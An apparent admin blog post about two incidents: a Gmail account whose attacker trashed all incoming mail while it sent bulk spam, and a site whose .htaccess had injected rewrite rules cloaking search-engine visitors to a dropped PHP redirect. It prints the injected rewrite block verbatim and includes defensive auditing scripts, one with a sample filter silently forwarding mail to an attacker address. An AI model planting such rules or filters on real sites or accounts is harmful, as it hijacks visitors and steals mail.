January 2016
Funny hacks observed recently

I recently handled two incidents in which customers reported some malfunction with their platform. The best one I found was a Google Apps account hack.

Incident A

A customer complained that he was NOT receiving any emails on his Google account, even though he could log in and send emails from the web interface without any issues. Please note that he was talking about a Google email account. What are you thinking now? Are you a Gmail user who has experienced something similar?

As a Google Apps admin, I checked Google Apps email using another user account and found no issues. I also sent an email to the customer who was complaining about the issue. Finally I reset his account password and sent some test emails to his address. Still nothing arrived. Strange, very strange! I could not blame Google for this issue and did not think Google's SMTP was at fault. Can you guess what the issue was? I started checking all of his folders, and finally I observed that his Trash folder contained recent emails. Great! That was what got me thinking harder about the issue.

Core issue
1. His email account was compromised; it had a simple password of the form name123456.
2. His email account was being used to send bulk email. The user did not know about this activity because he was not receiving any delivery-failure emails.
3. The hacker set a Gmail filter that deleted any email arriving in his INBOX.
4. Everything seemed normal when the user accessed Gmail.

It's a simple hack, but from a clever mind, and I call it operator hacking.
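To catch the filter trick from Incident A on other accounts, an admin can list each user's filters and flag the ones that hide mail. The following is an added example written for this post, not the author's own script: it audits filter records in the JSON shape the Gmail API returns from users.settings.filters.list (criteria plus addLabelIds/removeLabelIds/forward actions), run over constructed sample records. It goes a little beyond the incident by also flagging bounce-hiding and auto-forward rules, which serve the same purpose for an attacker.

```python
"""Audit Gmail filters for 'hide the inbox' rules like the one in Incident A.

Added example, not code from the original post. The filter records use the
JSON shape returned by the Gmail API (users.settings.filters.list); the
SAMPLE_FILTERS below are constructed for the demo, not from a real account.
"""
import re

INBOX, TRASH, SPAM = "INBOX", "TRASH", "SPAM"   # Gmail system label IDs

# A query made only of in:/is:/label: terms (or nothing at all) narrows
# nothing, so a filter with such a query matches almost every message.
BROAD_QUERY = re.compile(r"^\s*((in|is|label):\S+\s*)*$", re.I)
# Senders of delivery-failure reports; trashing these hides bulk-mail bounces.
BOUNCE_SENDER = re.compile(r"mailer-daemon|postmaster|delivery", re.I)


def is_broad(criteria):
    """True when the filter has no sender/subject restriction and its query
    (if any) consists only of mailbox-state terms."""
    if any(criteria.get(k) for k in ("from", "to", "subject")):
        return False
    if criteria.get("hasAttachment"):
        return False
    return bool(BROAD_QUERY.match(criteria.get("query", "")))


def suspicious_reasons(flt):
    """Reasons one filter looks like an attacker's rule (empty = benign)."""
    criteria = flt.get("criteria", {})
    action = flt.get("action", {})
    added = set(action.get("addLabelIds", []))
    removed = set(action.get("removeLabelIds", []))
    # "Delete it" in the Gmail UI becomes addLabelIds: ["TRASH"] in the API;
    # "Skip the Inbox" becomes removeLabelIds: ["INBOX"].
    hides = INBOX in removed or TRASH in added or SPAM in added
    reasons = []
    if hides and is_broad(criteria):
        reasons.append("catch-all filter that removes mail from INBOX or trashes it")
    if hides and BOUNCE_SENDER.search(criteria.get("from", "")):
        reasons.append("hides delivery-failure (bounce) messages")
    if action.get("forward"):
        reasons.append("auto-forwards mail to " + action["forward"])
    return reasons


def audit_filters(filters):
    """Map filter id -> reasons, for every filter that raised at least one."""
    findings = {}
    for flt in filters:
        reasons = suspicious_reasons(flt)
        if reasons:
            findings[flt["id"]] = reasons
    return findings


# Constructed sample: one benign filter and three of the kind seen in attacks.
SAMPLE_FILTERS = [
    {"id": "f1", "criteria": {"from": "newsletter@example.com"},     # benign: one sender skips the inbox
     "action": {"addLabelIds": ["Label_12"], "removeLabelIds": ["INBOX"]}},
    {"id": "f2", "criteria": {"query": "in:inbox"},                   # Incident A: everything -> Trash
     "action": {"addLabelIds": ["TRASH"], "removeLabelIds": ["INBOX", "UNREAD"]}},
    {"id": "f3", "criteria": {"from": "mailer-daemon@"},              # hides bounces from bulk sending
     "action": {"addLabelIds": ["TRASH"]}},
    {"id": "f4", "criteria": {"from": "boss@example.com"},            # silent forward to the attacker
     "action": {"forward": "drop@attacker.example"}},
]

if __name__ == "__main__":
    for fid, reasons in audit_filters(SAMPLE_FILTERS).items():
        print(fid, "->", "; ".join(reasons))
```

For a real account, fetch the records with the API call named above (the `filter` array in the response) and pass them to audit_filters. As Incident A shows, a password reset on its own leaves the filter in place, so the audit belongs in the compromise-response checklist alongside the reset.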


Incident B

The second incident was about .htaccess.

When a user reached the site from Google search results, they were redirected to a porn site. But when we accessed the site directly, there was no issue. I asked the dev team to check the application source code for changes, since they are using PHP scripts. They responded that no code had been modified in the files. So I had the false thought that, if the site had been compromised, the hackers could have submitted a wrong sitemap URL and Google was using that URL for the redirection.

One of the dev team found the cause of the redirection. The hacker had added some mod_rewrite rules that redirect only requests arriving with a search-engine reference, and dropped in one additional file.

# Injected block as found in the site's .htaccess (mod_rewrite must be enabled)
RewriteEngine On
# Skip these rules once a request has already been internally rewritten,
# so the redirect does not loop.
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
# Only cloak visitors whose user agent OR referer names a search engine;
# direct visitors (and the site owner) never see the redirect.
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
# Hand the original path to the attacker's dropped PHP file.
RewriteRule ^(.*)$ baritone-crossable.php?$1 [L]

He did not break anything on the existing site, and direct visitors had no issue at all.
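Because the redirect only fires for search-engine traffic, a maintainer checking the site by hand will never see it. A quick way to find this kind of cloaking is to scan .htaccess for RewriteCond lines that test HTTP_REFERER or HTTP_USER_AGENT against search-engine names and feed a following RewriteRule. The scanner below is an added example written for this post, not the dev team's tool; the .htaccess text it scans is constructed from the rules above plus a benign front-controller rule, and the search-engine name list is extended beyond the five the injected block used.

```python
"""Scan an .htaccess file for search-engine cloaking rewrite rules.

Added example, not from the original post. SAMPLE_HTACCESS is constructed:
it combines a common benign front-controller rule with the injected block
from Incident B.
"""
import re

# Names a cloaking rule tests for; the incident used the first five,
# the rest are added here as an assumption about what other kits match.
SEARCH_ENGINE = re.compile(r"google|yahoo|msn|aol|bing|yandex|baidu|duckduckgo", re.I)
COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
CLOAK_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")


def find_cloaking_rules(htaccess_text):
    """Return one finding per RewriteRule that is gated by a referer or
    user-agent condition naming a search engine and rewrites somewhere
    other than '-' (pass-through)."""
    findings = []
    pending = []  # RewriteCond lines seen since the last RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        m = COND.match(line)
        if m:
            var, pattern = m.groups()
            pending.append({"line": lineno, "var": var, "pattern": pattern})
            continue
        m = RULE.match(line)
        if m:
            target = m.group(2)
            gated = [c for c in pending
                     if any(v in c["var"].upper() for v in CLOAK_VARS)
                     and SEARCH_ENGINE.search(c["pattern"])]
            # mod_rewrite conditions apply only to the next RewriteRule,
            # so the pending list is cleared whether or not we flagged it.
            if gated and target != "-":
                findings.append({"line": lineno, "target": target,
                                 "conditions": [{"var": c["var"].strip("%{}").upper(),
                                                 "pattern": c["pattern"]} for c in gated]})
            pending = []
    return findings


SAMPLE_HTACCESS = """\
RewriteEngine On
# normal front-controller rule (benign)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# the injected cloaking block from the incident
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^(.*)$ baritone-crossable.php?$1 [L]
"""

if __name__ == "__main__":
    for f in find_cloaking_rules(SAMPLE_HTACCESS):
        conds = ", ".join(f"{c['var']}~{c['pattern']}" for c in f["conditions"])
        print(f"line {f['line']}: rewrite to {f['target']} gated by {conds}")
```

To confirm from outside without touching the server, fetch the home page twice with curl, once plainly and once with a search-engine referer (`curl -sI -e https://www.google.com/ https://site.example/`); a cloaked site answers the second request with a redirect or different body. Any rule the scanner flags should be cross-checked against the file it rewrites to, which in Incident B was the attacker's dropped PHP script.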

From both scenarios we can learn a common fact: neither hacker disturbed the existing platform (the Google account or the site's SEO), yet both achieved their purpose of marketing by using someone else's resources.

